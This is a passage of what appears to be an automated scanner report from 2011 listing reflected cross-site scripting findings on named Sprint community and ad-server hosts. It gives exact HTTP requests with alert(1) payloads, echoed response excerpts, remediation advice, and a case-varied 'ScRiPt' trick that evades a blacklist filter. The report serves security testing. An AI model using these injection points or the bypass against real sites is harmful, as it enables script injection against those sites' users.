Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
p = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless/customer-serviced0f1a";alert(1)//887e419074d/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.43. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49680"%3balert(1)//4dc0b3f35fc was submitted in the REST URL parameter 3. This input was echoed as 49680";alert(1)//4dc0b3f35fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless49680"%3balert(1)//4dc0b3f35fc/general/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:36 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=129929 t=1315099176570665
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
fileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless49680";alert(1)//4dc0b3f35fc/general/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip
...[SNIP]...

5.44. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb/general/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 9
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=130149 t=1315099175310012
Connection: close
Content-Length: 40601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb/general/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.45. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless/general5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:44 GMT
Server: Apache-Coyote/1.1
X-JAL: 11
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=453971 t=1315099184012772
Connection: close
Content-Length: 40601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless/general5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.46. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35f30"%3balert(1)//0d70885b912 was submitted in the REST URL parameter 4. This input was echoed as 35f30";alert(1)//0d70885b912 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless/general35f30"%3balert(1)//0d70885b912/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:45 GMT
Server: Apache-Coyote/1.1
X-JAL: 9
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=217937 t=1315099185636976
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless/general35f30";alert(1)//0d70885b912/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.47. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/sprintblogs5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf/buzz-by-sprint/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:25 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=121050 t=1315099165474445
Connection: close
Content-Length: 40604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/sprintblogs5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf/buzz-by-sprint/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.48. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ba4c"%3balert(1)//4747f9a3021 was submitted in the REST URL parameter 3. This input was echoed as 4ba4c";alert(1)//4747f9a3021 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/sprintblogs4ba4c"%3balert(1)//4747f9a3021/buzz-by-sprint/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:26 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=129521 t=1315099166685309
Connection: close
Content-Length: 40559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ar profileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/sprintblogs4ba4c";alert(1)//4747f9a3021/buzz-by-sprint/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerError
...[SNIP]...

5.49. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcde9"%3balert(1)//a061888315 was submitted in the REST URL parameter 4. This input was echoed as bcde9";alert(1)//a061888315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/sprintblogs/buzz-by-sprintbcde9"%3balert(1)//a061888315/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 8
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=199323 t=1315099175395176
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ngTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/sprintblogs/buzz-by-sprintbcde9";alert(1)//a061888315/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.50. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/sprintblogs/buzz-by-sprint67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 8
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=162814 t=1315099174017960
Connection: close
Content-Length: 40604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/sprintblogs/buzz-by-sprint67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.51. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66de4'%3balert(1)//23d1f4a63b3 was submitted in the mpck parameter. This input was echoed as 66de4';alert(1)//23d1f4a63b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D35795102566de4'%3balert(1)//23d1f4a63b3&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4598
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=35795102566de4';alert(1)//23d1f4a63b3" target="_blank">
...[SNIP]...

5.52. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0a59"-alert(1)-"3dcd426b95b was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:20 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4592
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b");
mpck =
...[SNIP]...

5.53. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6e5e"%3balert(1)//5a3f34f4b67 was submitted in the mpvc parameter. This input was echoed as c6e5e";alert(1)//5a3f34f4b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/c6e5e"%3balert(1)//5a3f34f4b67 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4594
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://c.casalemedia.com/c/1/1/89733/c6e5e";alert(1)//5a3f34f4b67");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://c.casalemedia.com/c/1/1/89733/c6e5e";alert(1)//5a3f34f4b67");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc
...[SNIP]...

5.54. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4785'%3balert(1)//c24c09353c6 was submitted in the mpvc parameter. This input was echoed as a4785';alert(1)//c24c09353c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/a4785'%3balert(1)//c24c09353c6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:35 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4594
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://c.casalemedia.com/c/1/1/89733/a4785';alert(1)//c24c09353c6http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025" target="_blank">
...[SNIP]...

5.55. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73ced"-alert(1)-"46bd39e34f8 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=73ced"-alert(1)-"46bd39e34f8 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:37 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097677_1314893682667:57564808264332431; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:37 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:37 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=73ced"-alert(1)-"46bd39e34f8' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.56. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0c23"-alert(1)-"d0a07ccec42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=&e0c23"-alert(1)-"d0a07ccec42=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
